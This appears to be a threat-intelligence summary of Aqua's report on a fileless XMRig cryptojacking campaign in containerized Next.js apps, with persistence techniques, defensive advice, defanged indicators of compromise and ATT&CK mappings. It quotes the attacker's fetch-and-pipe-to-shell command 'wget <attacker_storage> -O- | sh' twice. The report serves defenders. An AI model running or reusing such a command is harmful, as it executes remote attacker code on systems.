Aqua Details Fileless Cryptomining Campaign Targeting Containerized Apps

Summary
Aqua describes a multistage XMRig cryptojacking campaign in containerized Node.js applications, including memory-based execution, persistence and mining traffic. The exact initial exploit was not determined, and Aqua found no evidence of access to customer secrets.
Key points
- Aqua’s telemetry identified the campaign in containerized Node.js applications built with Next.js; the exact exploit used for initial access could not be confirmed.
- The attacker ran a script piped directly from a remote host, then unpacked a loader into memory through a memfd artifact before deploying the miner.
- The campaign established persistence with cron jobs, init scripts, shell profile changes and an SSH key; processes used names resembling legitimate services.
- The XMRig miner communicated with a known Monero mining pool over a standard port. In a later phase, the attacker used chattr +i to hinder file removal.
- Aqua reported no evidence that customer secrets, tokens or keys were accessed. The article lists file hashes and staging and command infrastructure as indicators of compromise.
- The article describes runtime controls for blocking fileless execution and new binaries, detecting mining behavior and associating outbound connections with the processes that generate them.
Article Details
- Attack Vectors
- Aqua observed malicious execution through Node.js processes in containerized Next.js applications. It described initial execution as occurring through a Next.js exploit, but said the telemetry did not identify the exact exploit.
- The attacker used `wget <attacker_storage> -O- | sh` to fetch and run a first-stage script without saving it to disk. The script fetched a packed loader that unpacked into memory and executed from `memfd:upX`; the cryptominer was later dropped to disk.
- The attacker introduced binaries absent from the original container image and ran hidden executables and guard or watchdog processes to maintain the miner.
- Persistence included cron jobs, rc.d init scripts, shell profile changes and an installed SSH key. The attacker later used `chattr +i` to make key files immutable.
- The XMRig miner made an outbound connection to a Monero mining pool. The article does not disclose that pool's destination.
- Defensive Notes
- Aqua recommends enabling Drift Prevention in enforcement mode for baselined workloads and enabling Block Fileless Execution where memory-resident execution is not expected.
- Aqua recommends correlating cryptomining detections and outbound connections with the processes generating them, and reviewing authorized_keys and other persistence locations for unexpected changes.
- The article describes where Aqua's enforcement policies can block execution or mining traffic; it does not establish that each policy blocked this observed attack.
- Aqua reported finding no evidence that the attacker accessed customer secrets, tokens or keys.
Indicators of compromise
| Type | Indicator | Context |
|---|---|---|
| HOSTNAME | cts-assets[.]s3[.]us-west-1[.]amazonaws[.]com | Specific S3 bucket hostname identified as hosting the grep2.jpg stager. |
| HOSTNAME | redclub-websites-offer-images[.]s3[.]amazonaws[.]com | Specific S3 bucket hostname identified as hosting the grep2.jpg stager. |
| SHA256 | 72987d9755dbd12117a23f337054edcc51629563c3ff867fd65ccb948775d546 | SHA-256 of a packed stage. |
| SHA256 | 82258b64b331d1f0d345292b69da6e6f4381e8c7249654140b2c1167353b534b | SHA-256 of the malware loader. |
| SHA256 | 83a9d43c3d37983a551d4b525829b40e8af4de49cfc9524156400f983fd49699 | SHA-256 of a hidden executable. |
| SHA256 | b20f39fc00d242e706b6c30367ad811c676e0575050a4ec2f30104b696944b49 | SHA-256 of the XMRig miner identified at /tmp/nodes. |
| SHA256 | fce7781a199f2b65bdb47dac602ecf397941235670818e79e5d9a9d0fa4cceea | SHA-256 of a packed stage. |
| SHA256 | ff990066f7860be6f2893550e58c0ab485c330edc8a4a55a289557004eb9ef99 | SHA-256 of a nested Go packer. |
| URL | hxxp[:]//185[.]216[.]75[.]152 | Address listed under C2 and staging infrastructure; its specific role is not disclosed. |
| URL | hxxp[:]//221[.]156[.]167[.]200:9090/js/ | Stage-one and payload server listed under C2 and staging infrastructure. |
| URL | hxxp[:]//77[.]90[.]13[.]20/dashboard | Payload host listed under C2 and staging infrastructure. |
MITRE ATT&CK
T1027.002 · Software PackingA packed loader and further packed stages were identified in the infection chain.T1036.005 · Match Legitimate Resource Name or LocationThe miner and companion processes used names resembling legitimate system services.T1037.004 · RC ScriptsThe attacker modified rc.d init scripts for persistence.T1053.003 · CronThe attacker established persistence through cron jobs, including a reinfection cron beacon.T1059.004 · Unix ShellThe attacker piped a remotely fetched first-stage script into `sh` using `wget <attacker_storage> -O- | sh`.T1098.004 · SSH Authorized KeysThe attacker installed an SSH key as a backdoor on compromised hosts.T1105 · Ingress Tool TransferThe first-stage script was fetched from a remote location and then fetched a packed loader.T1190 · Exploit Public-Facing ApplicationAqua described initial execution through an exploit affecting an internet-facing Next.js application, while stating that the exact exploit was not identified.T1222.002 · Linux and Mac PermissionsThe attacker used `chattr +i` to set immutable flags on key files and hinder deletion.T1496 · Resource HijackingThe attacker ran XMRig to mine Monero using the affected workload's resources.T1546.004 · Unix Shell Configuration ModificationThe attacker modified shell profiles for persistence.
Malware
Vendors
Products
Aqua Runtime ProtectionLinux infrastructure. Identifying and stopping them inside containers requires workload context. Aqua runtime protection operates across containerized workloads, virtual machines and hosts with the process, file,Next.jsAqua’s runtime behavioral detection engine surfaced a multistage fileless XMRig cryptojacking campaign affecting containerized Node.js applications built with Next.js (React).Node.jsAqua’s runtime behavioral detection engine surfaced a multistage fileless XMRig cryptojacking campaign affecting containerized Node.js applications built with Next.js (React).ReactAqua’s runtime behavioral detection engine surfaced a multistage fileless XMRig cryptojacking campaign affecting containerized Node.js applications built with Next.js (React).